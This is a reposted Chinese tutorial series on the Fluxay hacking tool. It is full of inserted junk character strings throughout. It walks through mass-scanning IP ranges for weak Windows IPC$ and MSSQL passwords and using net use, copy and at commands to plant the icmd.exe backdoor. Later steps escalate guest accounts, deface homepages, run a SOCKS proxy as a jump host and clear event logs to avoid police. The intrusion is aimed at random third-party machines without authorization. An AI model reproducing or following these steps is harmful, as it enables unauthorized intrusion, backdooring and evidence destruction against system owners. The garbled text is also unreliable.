:]^YE/A$fB#W

1M+]t+eW QAM 6、探測完畢,也看到結果了,流光會問我們是否查看入侵檢測報告,不想看可以選否。

*sQ!cR:C’oms

;w I`x+y

|I)vh7?xc|

;Hga+B5r:vt#Je 報告的畫面

2z)S”nS @l4~#VM

ydx!w*O b| {?Cb1ZDZ

\.i c`h xc 7、如果要探測的是一個用戶名,就需要添加字典、或者密碼方案。方法是:右鍵單擊解碼字典或方案 → 編輯 → 添加 → 選擇一個密碼檔即可。 ]}E5? J l/@

J$“IO#R3i 以上就是流光的一次簡單的探測了,事實上這些功能只能算是流光的2.5版的功能,流光2001增加的IPC/SQL/高級掃描等功能,使流光更加強大。如果你對這個已經很熟悉了,相信你看流光的HELP就會很快的學會其它的使用方法的。

9\W i R-JUV j {L k/X |

關於用戶名的問題:有人覺得自己加入的用戶名不一定存在,如果不存在豈不是白費了力氣?這點你大可以放心,流光會進行驗證的。而且現在註冊的用戶入數之多,想個沒有的名字都難,不信你隨便敲個試試。

Vi~PLWdY UYk5@Ou

關於字典的問題:流光可以使用字典方案來探測,當然你也可以生成字典,有的新手在作練習的時候不知道怎麼做,你也可以用記事本生成,每行輸入一個密碼,存盤後將擴展名改稱.DIC,流光就認出來了:)如果你連擴展名都不會改 :( 那……

wp-w7J”Ga)\af+p

L/\Di/`@y X#c

2a2H~/f9W[,L o r @m F ~

只要是學習、誰都會遇到困難,我也是問題多多,還得向小榕、EKIN討教,歡迎大家多交流 :)

]J+|3{,mJ-k#j!M

0W H%X$sp/@ a

u3I4L%S9n btd

P#m)Zqs

`1_s”W)BD :c”{n_r]

待續……

香煙 2007-5-28 11:07

流光教程二

很長時間也沒有寫什麼東西了,這源於我的懶惰和生活缺乏激情。我的記事本上一大篇都是欠朋友的承諾 :(

l P8M”F5M:b2|0k !J:Ix~R h

你既然看到這兒了,就在聽我牢騷幾句吧:)搞安全應該有正確的心態,別以為你會了個工具使用就可以一步登天。

{B \[y0x\/u ‘a+g a S)tUc

交流、學習才是最重要的,把自己心態放正,無論我們是高還是低。

R p4O)Z’qT#L n.Wxu3Zk0x

5F i GX!xJL+Z#`dN

今天要寫的是流光的IPC探測: \,`;P_`?

Ev b n+jq 一、目的和任務: +@g2Bs/dp+i

M UA0P@ O;t pu!?DP

1、用流光的IPC探測獲得一台NT主機的管理權限,並將這台主機做成一個跳板/代理。

V |nnP;_gTX] 2、學習IPC探測的相關知識。

!gnaW4v,Ft9~ 4X-R0J’U:\ |td

二、探測流程:

E],@9y/b Bm#a~ S8HD#?%X

1、你得有流光,我這裡試驗用的是流光2001.FOR Win2000 中文版。FOR Win98的不可以。因為IPC連接功能是NT/

X.Q#mG”Vj^S }+T!J (U:s,o|P1F\I2p

2000提供的功能。而且流光FOR 2K 要求你的操作系統得是NT/2000,否則流光啟動會失敗!

+DfdoX;})J (~\Q.` v \|7\3o

什麼是IPC:

l2E6WK0@4b^

d,d-Txkrx!miLM IPC是指”InterProcess Communications”,準確的說是ipc$,是默認的在系統啟動時的admin共享。 .p gsh Y_E

S#M+Y+c^+\_|

IPC$是Windows NT/2K中特有的遠程網絡登陸功能,它的特點是在同一時間內,兩個IP之間只允許建立一個連接。 (nV6s7f4k

RE u*@!T 注意,你試圖通過IPC$連接會在EventLog中留下記錄。不管你是否登錄成功。 g/?”o[;We AvE w

2\”D,R+t6u;z $s e5mP6@^5v7t

:s#n8[q4rA g

可不可以通過IPC$暴力破解密碼?當然可以 ! 不過,是不是太笨了點 …

#p”U`9F9v8lv,P

xK8X$rAm k{8K*G7q5R

2、首次啟動流光,會看到註冊的畫面,具體操作請參考本人第一篇教程。我們在主頁面上可以有幾種方法來通過IPC

sI)[at

M9ly3t p 探測獲得管理的權限。這裡我們要作的是得到一台跳板,那麼就可以用命中率高的辦法來探測了(測試一堆IP來得 A:q6EkB5_v

nLa5Q*pxL

到弱口令)。

“S[;hr4]W)@

9Q$?5X4w(a 在主界面選擇 探測→探測POP3/FTP/NT/SQL主機選項,或者直接按Ctrl+R。

u ~ ]` W6C 圖main1 4H%SmP u3`-g

7\0v7S7S^ue

+k.h]7}vr4A*| “B^;XKZ0L;R”_-H

圖main2 Qmm _ Lh7GV

-XCq2S~ cQ

EG”miTgi+u

6N5_Vp!Y0@ws0r,E 3、出先了上面的小窗口,輸入我們要破解的IP段,我們輸入了來看看。圖main2我們把「將FrontPage主機自動加入HTTP主機列表取消了」。因為我們只想獲得IPC弱口令,這樣可以加快掃描的速度 :)填入IP,選擇掃描NT/98主機 k3P.gQ$p

.ZA F#w X 4、探測中…… (start1) %_,sn#G;q3Y`

!Gv?@G;t0|1t_D

(注意如果你要探測的是流光保留的國內的IP段,會被禁止的,也就是探測的時候信息欄出現”IP保留”的字樣) 6rb2ZLn9n’?3F

M.KoJ2c

!dnP6me;D%C iCBt)hvs!bm)v

6e(JmneR 5、這是掃描到的NT/98主機列表:(jg1) 9yd R9V @c E G

4z zC1Kn9GOP ?

1sa _W Om9l

‘U0x?U mk ^2G5j

6、沒有掃描到常用密碼:(

2\”r’i’kAn;o 6KgORI”y t}-T$J

HfegS j c,o9v*LQ)K:F

7、就不要查看報告了 :… e2N(Ki,t \WM@FO

} z’p-S%yYu4W

WU9g._w/S5A

\:kr_8_7gA)A 8、有了不少NT/98的機器了,正式開始IPC$探測:IPC$主機-探測-探測所有IPC$用戶列表。 $P8E]3\9B K2pg

AP#[(N W5P4Y

%n)T h9qO[k”U3y P Xe

)g2tM”l-^)A.s8N} 9、注意下面兩個對話框的設置:全選上,我們只要IPC$管理員的弱口令。然後點選項

Y i:~C{DP Nzy _x3wxL

(C0M4X W@vO

“mx-?qz]%n4z 10、點「選項」 :為了加快弱口令掃描速度,這裡的兩個我們可以全部取消,比如下面的那個,如果對方禁止列出用戶了,我想對於一個網管來說,弱口令可能性也是微乎其微。 T1@+Z\q _’xbU

3U+n)L1?1ZHE0E

?]*\9K5\6{4o2{3a l8_W

-~K+d6^]%w mg x1_fw[

11、探測中……

L|9Wl/`9i!w

iX5~o5y”E C+@ /l8f#OxW:@Q

FL?HKg/vQ

12、有密碼了:) vh3tv/zll,p

xm;{Z r+L3{~”k

y1pg2x l z:P l(f6y2[2vSY;K,]

13、又出現了查看報告的窗口,看看 :)

#Y0U fH M@,@Tf x

@^%Z0v(t [| 9m-`)X-P(Q#o,I

C8E [,F W

14、有遠程主機的管理密碼了,我們剩下的就是想辦法控制它了,有什麼好辦法么? :)有的是 !自己看看工具- i:h0{(AGCO5O

H.j+f!X;Fp8o 菜單下的IIS遠程命令:)是不是很簡單呢,我以後在說,今天還是先練習net 命令吧。

}6Pb \+u W#C %V%`*@$m*u”pHP

15、黑了他 !

w2K#cu”e}

@2]*w5d.Y+V’D8bB 開個dos prompt 執行如下命令,本次用的例子如下圖。

1v’kePX4a-r

)z9N,s5hb-AaH_ 1、 net use file://對方ip/ipc$ “密碼” /user:”用戶名” || 建立遠程連接

6sBdD1z3l p#T(o_p5ve+PSqC

2、 copy icmd.exe file://對方ip/admin$ || admin$是對方的winnt目錄 :) 這裡文件多。

*Q1T*l,e”K%_/E

-Pr:z%mOn/L 3、 net time file://對方IP/ || 看看對方的本地時間

{7J{ H.|:f!oy Q\M

R g;Yi}x+tO1j_ 4、at file://對方ip/ 啟動程序的時間 啟動程序名 啟動程序的參數 || 用at命令來定時啟動程序,在這裡我們用soon這個程序來做也可以,它可以取代 3/4兩步。

Luw UB @)L2~fy S0@lz

5、 telnet 對方ip 端口 || 1QLR1Z3W/h }

{K9x J4s-U(K%C-_*c

6、輸入pass (如果不是用icmd.exe,或者沒有設置口令就不用了) ||

8Hv3k?)um1o@~`[ QF@G~%gZ8jF

7、在開個窗口,繼續copy 我們用的東西。 copy sock.exe copy ntlm.exe copy cl.exe clear.exe 1p”?+X1LN$K~4k

za1\5E[:?:j5f

圖cmd1

-MRgW,~F/cx

q\Vh |,P #on8N/R` l%RB

9O2i,ZZ ~/~,b kA%c4f-h!v Q 圖cmd2

Nl#I\*s E V

Ui HR”C%X

;L;\#~A-g])_$o

Z(G;iiC 如果我們真的想黑了他,只需要把我們的首頁文件覆蓋目標的首頁就ok了,我們可以通過dir /s default.htm或者dir /s index.htm 來確定對方首頁的為止,一般是在X:\interpub\wwwroot\ .

%\YUsC5z2th2w j2WwPs*C:@

假如首頁文件是default.htm並且在c:\interpub\wwwroot,這樣:copy default.htm \\ip\c$\interpub\wwwroot n{*{]4W0F4W#M

_s8c8P\B K

下面的圖有演示 t2~5l:i’v,j

.T’l!h)XGK_-FN^ 7、其實黑人家是很低級並且沒意思的:(,我們最好是物有所有,作成跳板吧,今後幹活方便點:) /S.S,_? ^”L-y

FD(HL ^ 執行我們copy 過去的ntlm.exe ,取消驗正。在給自己留個後門,比如提升guest的權限,或者其它的後門工具,這類東西多了自己選吧,看看殺手copy的那堆東西 :)

Gk,Q@ X”n\m us E

} ^\W(a G V,S

Y1aU j9t ^/n[7K

6Z`!q!Dx-W\ 8、做個SOCK5代理玩玩,用在QQ上不錯喔: cqQ `k+h8m

1G1}lX’S(F

執行我們copy 過去的sock -install,net start skserver 看看用在QQ上的效果:)

1C.P7F6?”mY

[7Dnl|@

*b wh ?}1O/SW

0s(r2G:K9_A\kB/iw 是不是沒有看清上面的步驟呢? \$u1Ll]qJ,\Q(e

1QG2S/zq4_0DK wN 下面是我telnet 上去後所有的命令:)

M)M k|.Z $me*bZRZr

0c0Zw8X7}I

$pF g1^.A 9、還能做成其他的么 ? yLP4s#w”\5i4|

/}2}H6h!jc/|o;A

當然了,只要你有時間,並且願意做,我曾經偷偷的把自己的主頁放到人家的server上,速度快、空間無限,嘿嘿 :)

Ab!W2`My^#v

5Lj} O`qG 10、日誌清除,斷開連接 : dB#Va F~w f

“x)Op(r[`9D

執行我們copy 過去的cl.exe clear.exe 都可以清除日誌,比如clear all :清除所有的日誌。然後在斷開連接:net use /delete

FNwL3v

4J$lx’Xztp 這步我認為是必需的,尤其是在一些有爭議的站點上,或者是國內的站點,除非你想讓電視上報導XXX地區我神勇刑警捕獲弱智黑客一名XXX。 ‘rKIh8G V(V

$Ftj+\W6f

在網吧寫完 :( 錯誤之處請賜教。 ,f^#B#yg3u J#q

u;Y/q~3hN A~ 只要是學習、誰都會遇到困難,我也是問題多多,還得向小榕、EKIN討教,歡迎大家多交流 :)

香煙 2007-5-28 11:08

流光教程三

關於IPC$的終於寫完了,那個該死的網吧,鬧哄哄的聲音聲聲入耳 :(,你可能想不出,IPC$探測是我在網吧完成的,而且那個網吧還有公安部門的網絡監視器,這東西很有意思,好像是VXD調用,和IE運行庫集成到一起的。哪天非弄來研究一下,說不定一款別具特色的木馬就問世了 :) PY{ S+Fy!Yo

%J@2J!QlVW7u;A

不知道你看完前一個教程有沒有要扁我的想法。。。。

zv’y;w,\!msU

R7dr8gLWpd 交流、學習才是最重要的,把自己心態放正,無論我們是高還是低。 jN;d|C c%|]

\#O”o7Nd

+ER[ x`v’r 今天要寫的是流光的SQL探測,順便說說ipc$補遺和其它的探測手段。

sI!\~*F3~

hmw.N Eer-Ca+t 一、目的和任務: 1Z%CUh!v:@i DZ

/]a E)Z4G#].e

1、用流光的SQL探測獲得一台NT主機的管理權限。 dU/[-d9JI’k

2、學習SQL探測的相關知識。

^q$f5F k o;d qJ 3、IPC$補遺和其它…

$n j6n$V yl 二、探測流程: ,y?8gzw)l

,F7ajG@:[ 1、你得有流光,這話不用在說了吧:) rcHFO4w|C

Ny|f\X

什麼是SQL:

2?Ek\+Z0G”E \;f”n0Y0? x+F^]6~ H9r

SQL:微軟開發的數據庫,專門用在微軟的OS上,功能類似Linux 下的Mysql,暈……,到底誰類似誰啊?有時間

7K$e.k Jbp (wi4PW6s9pU8e/C*H

去看看SQL的聯機手冊,說的很明白。

W8A4of)?)t)U

‘?c3QW@.k#Dh@*Ll SQL服務程序支持的網絡協議: Nl*`yf ?

.G0y)?F,R$`rH Named pipes :使用NT SMB端口來進行通信,存在被SNIFFER截獲數據的危險。

YB5I7`ME E9v4D

-If}ru \ IP Sockets :默認狀態下開1433端口,可以被掃描器探測,存在被SNIFFER截獲數據的危險。

:b3L{~-S Xl6}E!]2c o3C]

Multi-Protocol :客戶端需要支持NT RPCs,數據加密。 4T7f3e?{1`[a

JJq(S:o9`\,nk

NWLink :存在被SNIFFER截獲數據的危險。 5{/AhH3_F jv*LM

%^3qxM8h:\qZ `W!y!m

AppleTalk (ADSP):存在被SNIFFER截獲數據的危險 v”t3N”e DZx

7y3r KD UkGZW@ Banyan Vines :存在被SNIFFER截獲數據的危險 :t k6Z7RZ;W~

Bkh{3_/y9k7D p

在Internet上,95%以上的SQL Server 採用的都是IP Sockets協議,流光探測的就是這個協議默認的1433端口

;MA’vxIjn.L”V7E

([Z8u)b[1N)l[xjf

vI’Go’}dF E q.j 2、我們要獲得SQL 主機的管理權限,那麼還用命中率高的辦法來探測了(測試一堆IP來得到弱口令)。

Hz W2VB”Pq

.~8U6@/\?H:{ 對一台固定主機的探測等我下期的教程:) WUTp!~-M:K

s)XZh4Lz

在主界面選擇 探測→探測POP3/FTP/NT/SQL主機選項,或者直接按Ctrl+R。 ~F)_2mc1J!_2k3o T%@

圖main g;S:]_4M$^

)[MQp j

V_0@sF~

$yX0tZ;TX’l(u(b

I0i)Q2cu2iv/ul

3、出先了下面的小窗口,輸入我們要破解的IP段,我們輸入了來看看。(注意如果你要探測的是流光保留的國內的IP段,會被禁止的,也就是探測的時候信息欄出現「地址保留的信息」)

iO~/qo|p4\ 圖inputip

@,l6S/mi6p ,S4^XK-rb

W7i}tF,?` H B j1jWF:~|;MV

%{]-Y;`(wR-[cn 4、探測中……

5hB-u.aXGA Xb

bm!hl]-Kn|1F5B 5、有密碼了:) 圖psss 1→3 I*Xett-^ wY+d:N(Q

`,Te`#p` yc2EJ*i7x%|Qu’e

t:` V9^]

Ee+x-va;W ]F

6uR8p)Crk5\7?

aH0cgLClEGp9I

*{(ShN:n

2H]6I3xJ4V | ip#^/H] My-I g7Z

6、下面我們進一部獲取管理員的權限。 4b.RQK4L

用SQL 客戶端去連接主機,沒有裝SQL :( ……………… 沒關係,流光自帶了連接的工具,以前我一直都是用的天行的工具SQLexec,但現在可以不用它了。 A d-i9MC3O!oZ1g

R`s AB$u@A

打開菜單 工具 → MSSQL工具 → SQL遠程命令看看:) f8jZ]/J

圖tools

| q^%g{$H|8p6~

D~ fE/Yj’Hyy G4k#X,br(h

+sjL t+N ]j 圖SQLcmd 7`;^3d4KdWt\4ir2a

@0|#Zh*I`”U

2^M*O8rLD

zL$n*Gl 4nsB*l+?X

7、獲得管理權限、增加後門

s+Ex MDzj*y(N 圖cmdline 6R^ {.HtkOe g

5x%G7L_ z;LM A

L0Y?2b:sy

8HNh#wk.f

0f-}8s(Z%Q gO

{9Rhd aD 8、現在我們已經是管理員了:)

3l”eM1G(e.?(U { y.M tn

以前我們是用at命令來遠程運行程序,今天順便說說流光中自帶的「種植者」,看看 工具 → nt/iis工具 → 種植者,我們來用它遠程啟動icmd這個後門。 xW9{5d lp

4o@7Fi.O5Mt{

圖lookcrop 5q l.c.nM6k

H V} g.e}_O

oS8D’lL

l e9G1a~(wy

圖crop V8XM;u }\0t%_Sd

{j qEC#?Lc/W

)\$_;k,u-K

H(P1e)G;a7E 圖cropend d’VHG6@yu

m*XX6A$b N fe3A9u%B]Sk

-VLFBb*N 一分鐘後登陸看看:

2@’zrwIB.z b9f]V4V/Ys”q#gr2H

-L-e)L,m yQG1?c

@x3A)}U$I%k1mA

.Y,EMOF

6QNC4w6rs’t

7O2l(X;TT;bQp

9、再說說 工具 → 模式文件設定 → ipc簡單設置文件 。

0T:s(_)^CdaQt

3}.YUYvi)g8N 圖mode U k/dbcw’e4m

Da \[ j;^2m

8eQI H3er!\$R

H-QJ/njtF#c

#v(HkA%{,I9E

@i/V5V`uo 「工具」中其他的項目和上面說的兩個類似,就不多說了。

:AL A”sF)g\ H2K

8{7e(z[(~0j’]zF v

#Rn3O${]K”h9v NR 10、日誌清除,斷開連接 ,參考IPC探測,記住可以用種植者遠程執行命令。

Q]d%H Q Of5b ot-m mFnM8a#Cv3A

!oSO.LF|

關於IPC$補遺:上篇對與IPC$探測的文章,寫完後覺得還差點什麼沒有說:) T)Rlz*v#@gC

b8n2^,y}”Ui1` 1、我們雖然只探測管理員(admin)的弱口令,實際上在真正攻擊中是任何一個用戶口令都不會放過嘗試的,因為我們獲得了

E:mJ O#P0M,^EAJ !aF C??5k!qh9CH

普通用戶權限後可以提升權限,事實上,一個普通用戶的權限在*nix攻擊中是非常重要的。 lCkc)W@m

MN0f:GT%x

2、獲得口令後,攻擊手法多樣,不要局限於我的例程。

XJWu+Q |/U5B/Ffco

3、如果對方沒有XXX怎麼辦?,這類的問題去看看我以前整理的流光FAQ。 v!D+RH z K

‘K;t{“S(a?rM

關於其它探測:

O)},m1]u A1J

]6H {0^7C$?U 玩玩3389 ? Lxk8[l8F

Dc?~’^#mQ/c3L l

首先終端是WIN2K提供的功能,所以我們在掃描的時候就要選擇 「NT/98」的主機,在得到主機列表後自定義端

4]vE0~ b/o CY

6J:XH WY{AN”qu 口來掃描這些主機的3389端口,然後……

7ED.O4CM/]NZ 8l3m-J9x’?*B

玩玩cisco路由器? Y’}L4[x-}:qt

|7l5x\;nm 自己想想怎麼作 ?要是想出來了,我的以後的教程就不用看了 :)

4?` [wxXB”o/}~ y!GGM X}\(H:|’`

1_h(r5b”V1E3ht]%j

G6RK^XE-u 明白了么?我說的意思是要靈活使用流光:)

原創文章,作者:小藍,如若轉載,請註明出處:https://www.506064.com/zh-hk/n/195303.html

(0)
打賞 微信掃一掃 微信掃一掃 支付寶掃一掃 支付寶掃一掃
小藍的頭像小藍
上一篇 2024-12-02 20:34
下一篇 2024-12-02 20:34

相關推薦

發表回復

登錄後才能評論